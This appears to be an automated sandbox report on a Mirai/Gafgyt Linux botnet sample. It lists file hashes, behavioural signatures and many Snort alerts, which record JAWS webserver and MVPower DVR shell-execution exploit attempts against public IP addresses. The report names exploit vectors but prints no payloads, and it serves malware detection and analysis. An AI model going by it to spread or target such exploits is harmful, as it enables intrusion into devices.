Linux Analysis Report 9o6Z1wEokT

Overview

General Information

Sample Name:	9o6Z1wEokT
Analysis ID:	512668
MD5:	68cb43368a1a8837125de604f0c2a11e
SHA1:	aebd07f775086490ee2b054a59fa7f9494c8de84
SHA256:	126ddb96a062731ec243a9313504aaba974cbe7b677d39a23fd6750f88fc772e
Tags:	32elfgafgytintelMirai
Infos:
Most interesting Screenshot:

Detection

Gafgyt Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Yara detected Gafgyt

Malicious sample detected (through community Yara rule)

Sample tries to kill many processes (SIGKILL)

Sample is packed with UPX

Uses known network protocols on non-standard ports

Passes username and password via HTTP get

Sample contains only a LOAD segment without any section mappings

Yara signature match

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample tries to kill a process (SIGKILL)

Creates hidden files and/or directories

HTTP GET or POST without a user agent

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: 9o6Z1wEokT	Virustotal: Detection: 32%			Perma Link
Source: 9o6Z1wEokT	ReversingLabs: Detection: 35%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53120 -> 138.68.131.225:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53120 -> 138.68.131.225:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34640 -> 104.82.201.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46986 -> 156.213.55.108:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34640 -> 104.82.201.117:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.82.201.117:80 -> 192.168.2.23:34640
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54050 -> 104.115.139.217:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46986 -> 156.213.55.108:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49492 -> 210.99.207.176:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38716 -> 198.73.227.211:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54050 -> 104.115.139.217:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.115.139.217:80 -> 192.168.2.23:54050
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56750 -> 52.70.231.13:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49492 -> 210.99.207.176:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56750 -> 52.70.231.13:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57520 -> 104.104.60.154:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57520 -> 104.104.60.154:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.104.60.154:80 -> 192.168.2.23:57520
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60060 -> 8.210.248.86:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60530 -> 163.43.106.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60060 -> 8.210.248.86:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60530 -> 163.43.106.234:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42404 -> 197.13.239.56:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42404 -> 197.13.239.56:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45884 -> 185.17.248.122:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45884 -> 185.17.248.122:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53182 -> 23.198.77.7:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53182 -> 23.198.77.7:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.198.77.7:80 -> 192.168.2.23:53182
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55338 -> 192.240.170.144:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35240 -> 34.73.70.70:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55338 -> 192.240.170.144:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32902 -> 96.7.166.199:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35240 -> 34.73.70.70:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32902 -> 96.7.166.199:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 96.7.166.199:80 -> 192.168.2.23:32902
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48200 -> 104.108.128.83:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54216 -> 88.148.100.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48452 -> 103.114.55.23:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54216 -> 88.148.100.53:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37910 -> 184.24.49.150:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39786 -> 149.129.92.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57204 -> 75.118.157.75:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48200 -> 104.108.128.83:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.108.128.83:80 -> 192.168.2.23:48200
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54760 -> 142.234.150.237:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33438
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37910 -> 184.24.49.150:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.24.49.150:80 -> 192.168.2.23:37910
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57204 -> 75.118.157.75:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48452 -> 103.114.55.23:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54760 -> 142.234.150.237:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39786 -> 149.129.92.30:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33482
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33518
Source: Traffic	Snort IDS: 716 INFO TELNET access 217.110.218.43:23 -> 192.168.2.23:33554
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55204 -> 104.156.244.175:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41710 -> 45.86.69.26:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39310 -> 197.15.65.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55204 -> 104.156.244.175:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39310 -> 197.15.65.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41710 -> 45.86.69.26:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36600 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36600 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42620 -> 18.66.249.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34734 -> 104.102.53.44:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42620 -> 18.66.249.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52076 -> 95.216.219.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37190 -> 92.122.201.80:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34734 -> 104.102.53.44:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.102.53.44:80 -> 192.168.2.23:34734
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37190 -> 92.122.201.80:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.122.201.80:80 -> 192.168.2.23:37190
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41626 -> 45.242.108.103:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52076 -> 95.216.219.126:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38766 -> 194.105.116.8:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54942 -> 50.202.79.65:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50606 -> 155.138.246.9:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37074 -> 209.251.91.133:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50146 -> 108.160.178.221:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41626 -> 45.242.108.103:80
Source: Traffic	Snort IDS: 716 INFO TELNET access 195.162.70.50:23 -> 192.168.2.23:49088
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38766 -> 194.105.116.8:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46974 -> 116.92.244.142:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60680 -> 166.130.141.157:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41604 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50606 -> 155.138.246.9:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50146 -> 108.160.178.221:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52148 -> 49.212.233.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60680 -> 166.130.141.157:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46974 -> 116.92.244.142:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 116.92.244.142:80 -> 192.168.2.23:46974
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41634 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41604 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41604
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52148 -> 49.212.233.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41634 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41634
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36702 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49090 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51006 -> 139.30.254.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39674 -> 178.168.67.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49090 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49090
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51006 -> 139.30.254.30:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36702 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49380 -> 152.13.135.50:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46316 -> 85.215.82.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46316 -> 85.215.82.31:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39674 -> 178.168.67.90:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50128 -> 207.244.239.42:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47890 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60388 -> 138.68.241.177:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50128 -> 207.244.239.42:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47890 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59924 -> 103.89.23.61:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37508 -> 121.142.253.79:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60388 -> 138.68.241.177:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41718 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59924 -> 103.89.23.61:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37508 -> 121.142.253.79:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41718 -> 104.71.150.151:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.71.150.151:80 -> 192.168.2.23:41718
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49142 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49142 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49142
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38546 -> 18.184.42.77:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49172 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41212 -> 34.107.199.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38546 -> 18.184.42.77:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41212 -> 34.107.199.90:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49172 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49172
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48230 -> 23.10.81.41:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38142 -> 37.19.206.73:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39954 -> 23.15.46.102:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48230 -> 23.10.81.41:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.10.81.41:80 -> 192.168.2.23:48230
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47938 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55762 -> 186.189.148.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38142 -> 37.19.206.73:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55700 -> 184.26.252.73:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39954 -> 23.15.46.102:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.15.46.102:80 -> 192.168.2.23:39954
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56364 -> 148.153.145.107:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47938 -> 173.232.66.190:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55762 -> 186.189.148.187:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59908 -> 160.251.4.170:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56364 -> 148.153.145.107:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55700 -> 184.26.252.73:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.26.252.73:80 -> 192.168.2.23:55700
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59908 -> 160.251.4.170:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36840 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49266 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49266 -> 104.73.145.187:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.73.145.187:80 -> 192.168.2.23:49266
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36840 -> 176.240.146.30:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42736 -> 172.245.62.231:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55944 -> 78.24.213.83:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55944 -> 78.24.213.83:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42652 -> 103.163.195.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45918 -> 199.196.10.97:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42736 -> 172.245.62.231:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41446 -> 103.51.149.81:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42652 -> 103.163.195.106:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35602 -> 52.117.219.197:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41446 -> 103.51.149.81:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60654 -> 116.212.132.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35602 -> 52.117.219.197:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44846 -> 156.240.136.86:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60654 -> 116.212.132.40:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44846 -> 156.240.136.86:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33162 -> 82.165.68.118:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48526 -> 77.118.66.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33162 -> 82.165.68.118:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36804 -> 23.221.185.97:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46708 -> 104.16.240.1:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36804 -> 23.221.185.97:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.221.185.97:80 -> 192.168.2.23:36804
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36314 -> 178.79.132.110:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46708 -> 104.16.240.1:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42974 -> 72.246.67.227:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41754 -> 92.122.234.41:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57920 -> 80.78.24.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36314 -> 178.79.132.110:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59630 -> 178.154.224.180:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57868 -> 37.143.24.101:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57920 -> 80.78.24.15:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41754 -> 92.122.234.41:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 92.122.234.41:80 -> 192.168.2.23:41754
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59630 -> 178.154.224.180:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57868 -> 37.143.24.101:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42974 -> 72.246.67.227:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 72.246.67.227:80 -> 192.168.2.23:42974
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48456 -> 104.91.243.76:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33794 -> 34.72.161.123:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54970 -> 54.215.32.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48456 -> 104.91.243.76:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.91.243.76:80 -> 192.168.2.23:48456
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35484 -> 154.208.84.198:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33794 -> 34.72.161.123:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54970 -> 54.215.32.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35484 -> 154.208.84.198:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33316 -> 198.137.227.117:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49828 -> 206.237.203.53:80
